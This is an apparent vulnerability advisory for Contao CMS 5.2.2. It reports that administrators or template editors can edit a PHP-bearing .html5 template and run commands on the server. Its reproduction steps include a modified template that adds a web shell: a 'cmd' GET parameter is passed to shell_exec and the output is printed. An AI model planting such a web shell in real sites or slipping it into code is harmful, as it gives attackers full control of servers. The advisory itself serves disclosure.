Contao CMS | Authenticated Remote Command Execution

Information

Software Type Web App
Software Name Contao CMS
Affected Version 5.2.2
Software Vendor Contao CMS
Software Link https://github.com/contao/contao
Severity High
CVSS Score 8.2
CVE Link N/A
Affected Assets 84092+
Date of Discovery March 10th, 2025
PoC Exploit N/A

Description

Contao version 5.2.2 exposes a .html5 page that actually contains PHP code to backend administrator users or anyone with template editor privileges. At first galance this seems like a HTML file but upon opening it for editing, it contains PHP code and can be modified to perform command execution on the server. This file is like a backdoor that allows administrator to escalate privileges and own the server. There is no warning or double-check to warn users against harmful or malicious actions.

 

Reproduce

To reproduce this issue, login as a backend user with template editor privileges. Navigate to /contao?do=tpl_editor and clic “Expand all”, you will see a .html5 page, in my case it was mod_article.html5

No other file in this directory can be modified even with administrator privileges, this is the only file that allows modification and can execute PHP code.

Click on triple dots locate on right side of this fiel and you will see two edit options, one to edit the element ID and another to edit the source code. Click “Edit the source text of file”. You may be redirected to a URI like this:

/contao?do=tpl_editor&act=source&id=templates%2Fcontaodemo%2Fmod_article.html5

 

The original content was this:

<?php $this->extend('mod_article'); ?>
<?php if (!$this->noMarkup): ?>
    <?php $this->block('content'); ?>
        <div class="mod_article__inner">
            <?= $this->parent(); ?>
        </div>
    <?php $this->endblock(); ?>
<?php endif; ?>

 

I modified it to the following to create a GET parameter for running shell commands using shell_exec:

<?php $this->extend('mod_article'); ?>

<?php if (!$this->noMarkup): ?>
    <?php $this->block('content'); ?>
        <div class="mod_article__inner">
            <?php $cmd = $_GET['cmd'] ?? ''; ?>
            <?php $response = $cmd ? shell_exec($cmd) : ''; ?>
            <?= $this->parent(); ?>
            <?= $response; ?>
        </div>
    <?php $this->endblock(); ?>
<?php endif; ?>

 

You can interact with the GET parameter by visiting the following URI:

https://testhub.local/?cmd=ls

Proof of Concept (PoC) Video

Posted on: May 24, 2025 04:06 AM